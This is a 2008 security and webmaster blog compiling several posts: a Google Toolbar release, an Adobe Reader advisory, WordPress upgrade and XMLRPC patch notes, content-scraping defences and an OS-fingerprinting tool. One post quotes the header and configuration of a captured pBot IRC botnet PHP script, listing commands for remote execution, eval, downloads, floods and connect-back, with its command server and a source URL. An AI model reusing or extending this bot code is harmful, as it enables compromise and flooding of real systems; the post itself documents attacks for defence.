Google Toolbar 5 (βeta) is out. You can download it at toolbar.google.com/T5/.

Whats New

• Custom Button and new Google Gadgets Support
• Smart suggestion for navigation error (ie: 400 - 500 error)
• Google Notebook Integration - save notes and image
• Improved Autofill

Check out the Google Toolbar 5 (beta) youtube videos ↓

Google Toolbar 5 (beta) New Features Screencast

External Links

• Google Toolbar 5 Beta Download Page
• Google Toolbar 5 beta Features List
• Google’s Blog → Google Toolbar: Take your tools with you
• Google Toolbar Help Center
• Google’s Matt Cutts → How 404 pages work in Google Toolbar Beta 5

A JavaScript Buffer Overflow in Adobe Acrobat, Acrobat 3D & Reader allowed remote attacker to execute arbitrary code. The code will run with the privileges of the target user opening the PDF document.

Excerpt from iDefense Public Advisory;

Adobe Reader and Acrobat implement a version of JavaScript in the EScript.api plug-in which is based on the reference implementation used in Mozilla products. One of the methods exposed allows direct control over low level features of the object, which in turn allows execution of arbitrary code.

Workaround

Disabled Adobe Reader & Acrobat JavaScript. Perform Update ↓

Update -Adobe Acrobat & Reader version 8.1.2

Adobe released version 8.1.2 of Adobe Reader, Acrobat & Acrobat 3D to address
these vulnerabilities.

• Adobe Reader 7 and 8 users update to Adobe Reader 8.1.2
• Acrobat 8 users on Windows update to Acrobat 8.1.2
• Acrobat 8 users on Macintosh update to Acrobat 8.1.2
• Acrobat 3D version 8 users on Windows update to Acrobat 3D version 8.1.2

These vulnerabilities were discovered by Greg MacManus of VeriSign iDefense Labs.

Related Posts

• How to safely remove AcroRd32Info.exe (Adobe Reader)

External Links

• Security update available for Adobe Reader and Acrobat 8 (APSA08-01)

Today’s we just upgrade from WordPress 2.3.2 to 2.3.3 security release. There is 21 attack (script injections) on blog.kakkoi.net from 3 known bot-herder scripts ↓. The first attacker is from 212.24.62.200 → udkado.ru masking their useragent as Googlebot (a real human?). The were playing with my 302.curie redirect page at blog.kakkoi.net/uri/. I send the attacker data to abuse network and IronPort.

The next few hours we received 20 attack from the same bot-herder. They probably has a large scale of DDNS (china → korea → us ). Noticeably the scans pattern is predictable. From our Feb 5th attack all these botnet is targeting certain search keywords security, injection so we setup a honey-pot right on that particular URL.

Hacking Attempts on Kakkoi

Sort by Injection type.

The Bot-herder Host

Part of class pBot source taken from http://basiclifesaving.org/mycomments/rom.txt

<? 

/*
 *
 * #crew@corp. since 2003
 * edited by: devil__ <admin@xdevil.org>
 *
 * COMMANDS:
 *
 * .user <password> //login to the bot
 * .logout //logout of the bot
 * .die //kill the bot
 * .restart //restart the bot
 * .mail <to> <from> <subject> <msg> //send an email
 * .dns <IP|HOST> //dns lookup
 * .download <URL> <filename> //download a file
 * .exec <cmd> // uses exec() //execute a command
 * .sexec <cmd> // uses shell_exec() //execute a command
 * .cmd <cmd> // uses popen() //execute a command
 * .info //get system information
 * .php <php code> // uses eval() //execute php code
 * .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack
 * .udpflood <target> <packets> <packetsize> <delay> //udpflood attack
 * .raw <cmd> //raw IRC command
 * .rndnick //change nickname
 * .pscan <host> <port> //port scan
 * .safe // test safe_mode (dvl)
 * .inbox <to> // test inbox (dvl)
 * .conback <ip> <port> // conect back (dvl)
 * .uname // return shell's uname using a php function (dvl)
 *
 */

set_time_limit(0);
error_reporting(0);
echo "Ok unlocker. We did i!";

class pBot
{
 var $config = array("server"=>"Bucharest.ro.eu.ultra-chat.org",
 "port"=>"6667",
 "pass"=>"n",
 "prefix"=>"[R]",
 "maxrand"=>"4",
 "chan"=>"#unlocker",
 "chan2"=>"#unlocker",
 "key"=>"n",
 "modes"=>"+p",
 "password"=>"n",
 "trigger"=>".",
 "hostauth"=>"Robert.users.ultra-chat.org" // * for any hostname (remember: /setvhost xdevil.org)
 );

Related Posts

• Daily Hacking Attempts on blog.kakkoi.net - Feb 5th, 2008
• Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot & Trojan

External Links

• Wikipedia → Botnet
• Storm Botnet
• Dynamic DNS

I received lots of multiple botnet injection (e.g: code & sql) on my wordpress blog. All the failed attempts from these Botnet (Bot-herder) will be published in this post. Somebody might find the informations useful ↓.

Failed Hacking Attempts

Sort by Injection type.

Related Posts

• Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot & Trojan

External Links

• Wikipedia → Botnet
• Storm Botnet

Wordpress 2.3.3 fixes a few minor bugs and the debatable Wordpress 2.3.2 XMLRPC vulnerability. It took 4 months to track the XMLRPC exploit and 1 days for the patch to be release. Kudos to WordPress Developer especially Ryan & Joseph Scott for these quick security release.

Wordpress 2.3.2 XMLRPC vulnerability patches by josephscott

• xmlrpc.php.diff (0.7 kB) -on 02/02/08 16:53:22.
• xmlrpc.php.2.diff (3.2 kB) - on 02/03/08 04:49:26.
• 2.3-xmlrpc.php.diff (3.2 kB) - on 02/04/08 18:48:23 (2.3.3).

External Links

• Wordpress 2.3.3 Download
• Wordpress Development Blog
• Wordpress 2.3.3 Milestone
• village-idiot.org → WordPress 2.3.3 List of changed files (download available)

This issue has been raised 4 months ago (october 2007). Certainly this is one of BadPress Ticketing Problems. Until WordPress Developer release Official securities fix (v 2.3.2.1 || 2.3.5 ?? ) You might want to try this “debatable” patch by SecuriTeam - Paul (Yabba) Jones.

Note: Matt Mullenweg & the WP-Hackers is against secureTeam “hasty-patch” and their POC release. [wp-hackers] xmlrpc issue or no?.

Excerpt from Wordpress Support Forum » iframe injection problem?

Matt Mullenweg → [...] I would rather not have people think they’re safe and really not be, and there is a release coming shortly anyway. [...]
If anyone is scared and wants a fix NOW, they should either turn off registration (which is off by default) or delete xmlrpc.php. ~ Feb 3, 2008

WordPress 2.3.3 has been release it’s advice not to try this patches

Patch xmlrpc.php via WordPress Admin

1. Login to Wordpress Admin
2. Goto Manage » Files then scroll down to “Other Files” sections, type in xmlrpc.php. otherwise type the following URL in your browser address-bar ↓

   mydomain.com/wp-admin/templates.php?file=xmlrpc.php&submit=Edit+file+%C2%BB

3. Find the following code (around Line 1151 - 1203 ) within wp_xmlrpc_server::mw_editPost() class methods ↓

   if ( ( 'post' == $post_type ) && !current_user_can('edit_post', $post_ID) )

4. Replace with

   //if ( ( 'post' == $post_type ) && !current_user_can('edit_post', $post_ID) )
    if ( ( 1 || 'post' == $post_type ) && !current_user_can('edit_post', $post_ID) )
   

   saved.

5. Disabled New User Registrations for temporary.

External Links

• Wordpress Support Forum → iframe injection problem?
• SecuriTeam → WordPress 2.3.2 XMLRPC Vulnerability POC
• Wikipedia XML-RPC
• Google → Wordpress XML-RPC Vulnerabilities
• PHPXREF wp-trunk xmlrpc source

I’m quite surprise to see my server logs todays, Some dude decide to scrap my blog content (including my wp translations cache 100mb+ )

The Offending uri:
http://www.shouker.com/user1/baiheinet/2008/1/16/80897.html

I’d blocked the site but it wont stop the search engine crawler from indexing the content .

This is nasty Blackhat SEO methods to get the target website penalize for duplicate content on Major Search Engine. There is few solution that i found at various resources ↓.

• Report to Google, proxyreports@gmail.com provide the url & the google search query.
• Block the Proxy Referrer IP
• Add special no index meta for unknown search engine spiders.

  <META NAME="ROBOTS" CONTENT="NOARCHIVE, NOINDEX, NOFOLLOW">

How to track Google Proxy Hacked Duplicate Contents

1. Monitor your content with Google Alerts try used a unique Search terms for your website. i.e: blog.kakkoi, myname, myunique keywords, url http://blog.kakkoi.net, base64 safe uri encode.
   If you have a Google Webmaster Account go to Statistics » What Googlebot sees used the keywords as your Google Alerts search terms.
2. Search for copies of your page on the Web copyscape

Whitelisting Search Engine Crawler

IMO blocking the IP range of Proxy Server is not very practical. Having a Whitelist of Search Engine Crawler IP (class c) might do the trick. I’m working on a script for whitelisting search engine crawler for my wordpress. Hopefully i can finished it later this week.

Google Algo bugs

Dan Thies at seofaststart.com posts a details analysis regarding this issue, check out his post → Google Proxy Hacking: How A Third Party Can Remove Your Site From Google SERPs.

Recent Update

• Caught the proxy user just after I published this articles. Its human 117.8.222.77 / c-net 117.8.0.0/13 from Tianjin, China.
  
• The IP was graylisted on RBL & cml.anti-spam.org.cn so we send a letter to abuse@cnc-noc.net

SinFP by Patrice AUffretGomor, is a full operating system TCP/IP stack fingerprinting. Features both Active (brute) and Passive Methods and support for IPV4 & IPV6. SinFP only send maximum of 3 standards packet to any open TCP port to get the results. It’s damn fast and transparent (send valid SYN & options).

SinFP Online demo is available at gomor.org sinfp demo. You can grab SinFP OS Stack Fingerprinting package at CPAN or Gomor.org (External Links ↓ ).

SinFP package is available for Mac (PPC), Linux (included in BackTrack Linux distro) and Windows Binaries (ActivePerl).

External Links

• Net-SinFP-2.06
• SinFP Fingerprinting Overview at gomor.org
• All package by Gomor at CPAN
• SinFP at SourceForge

Google’s Matt Cutts caught on tape selling a 1st place link in Google Search for $500K.

This is a “Just For Fun” 1 minutes video on bribing Matt Cutts at recent pubcon2007

YouTube Video

This is what Matt Cuts’s has to say about getting 1st index in Google.

No one can guarantee a #1 ranking — not even me

External Links

• Matt Cutts → Tons of PubCon interviews on video and audio
• ReachTV → Interview with Matt Cutts from Google at Pubcon

I just upgrade today, WordPress 2.3.2, fixed a nasty vulnerability. I haven’t did any test yet but according to “blackhat domainer” you can view WordPress Draft Entry via simple URL parameters without log in (un-authorize view).

WordPress developer had to release this ’securities’ fixes before the upcoming 2.4. You could either wait for 2.4 (the milestone is almost ready?) or upgrade immediately. But before others exploit this vulnerability its better to upgrade.

Peter Westwood’s sum up all wordpress 2.3.2 recent change and update in details. Read it first before you decide to upgrade.

External Links

• How to know today what ShoeMoney is going to post tomorrow
• Wordpress 2.3.2 Announcements (dev blog)